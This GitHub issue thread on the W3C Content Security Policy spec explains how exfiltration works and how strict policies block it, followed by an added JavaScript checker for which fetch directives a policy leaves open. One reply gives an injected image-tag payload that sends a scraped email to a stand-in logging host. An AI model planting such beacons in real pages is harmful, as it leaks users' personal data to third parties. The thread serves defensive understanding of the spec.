Queries about exfiltration? #671

Closed
Blason opened this issue Jul 9, 2024 · 2 comments
Comments

Blason commented Jul 9, 2024

Can someone provide me any examples about https://w3c.github.io/webappsec-csp/#exfiltration?
I am still not clear about how exfiltration would occur which contents of the request, such as the URL, contain information about the user or page that should be restricted and not shared.

Can someone please help?

Member

annevk commented Jul 9, 2024

This type of question is probably better suited for Stack Overflow, but think of an attacker inserting something like <img src=https://someotherdomain/logger?victim=victim.com&user=emailaddressScrapedFromThePageAndInsertedWithJS>.

annevk closed this as not planned Jul 9, 2024

benatkin commented Aug 31, 2024

To prevent it you add very strict content security policies, like default-src: 'none' and it should almost work. The only exception I know of is #92 which is shipped in the spec but not in browsers: https://wpt.fyi/results/content-security-policy/webrtc?label=experimental&label=master&aligned
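
An added example (not part of the thread or of the CSP spec): a simplified check of whether a policy lets a page load a third-party URL like the image beacon described above, listing the fetch channels a policy leaves open. The origins, the sample URL and the function names are constructed, and source matching covers only 'self', '*', scheme sources and host sources written with a scheme.

```javascript
// Simplified CSP fetch-directive check; NOT the full W3C matching algorithm
// (no paths, ports, wildcard hosts, or the child-src fallback for frame-src).
const FETCH_DIRECTIVES = ['img-src', 'script-src', 'style-src', 'connect-src',
  'font-src', 'media-src', 'frame-src', 'object-src'];

// Constructed sample values for the demonstration.
const SELF = 'https://victim.example';
const BEACON = 'https://logger.example/logger?victim=victim.example&user=alice%40victim.example';

function parsePolicy(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // A repeated directive is ignored: the first occurrence wins.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

function sourceMatches(source, url, selfOrigin) {
  const s = source.toLowerCase();
  if (s === "'self'") return url.origin === selfOrigin;
  if (s === '*') return url.protocol === 'http:' || url.protocol === 'https:';
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme source, e.g. https:
  if (s.startsWith("'")) return false; // 'none', nonces, hashes: never match a URL here
  try { return new URL(s).origin === url.origin; } catch { return false; }
}

// True if `directive` (falling back to default-src) permits loading `target`.
function allows(header, directive, target, selfOrigin) {
  const policy = parsePolicy(header);
  const sources = policy.get(directive) ?? policy.get('default-src');
  if (sources === undefined) return true; // nothing governs this request type
  const url = new URL(target);
  return sources.some((src) => sourceMatches(src, url, selfOrigin));
}

// Fetch directives through which a request to `thirdParty` would still go out.
function openChannels(header, thirdParty, selfOrigin) {
  return FETCH_DIRECTIVES.filter((d) => allows(header, d, thirdParty, selfOrigin));
}

for (const header of ["script-src 'self'; object-src 'none'", "default-src 'none'"]) {
  console.log(header, '=>', openChannels(header, BEACON, SELF));
}
```

A policy that only restricts scripts still lets the image request carry the query string to the other origin, while a `default-src` fallback closes every fetch directive that is not listed explicitly.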
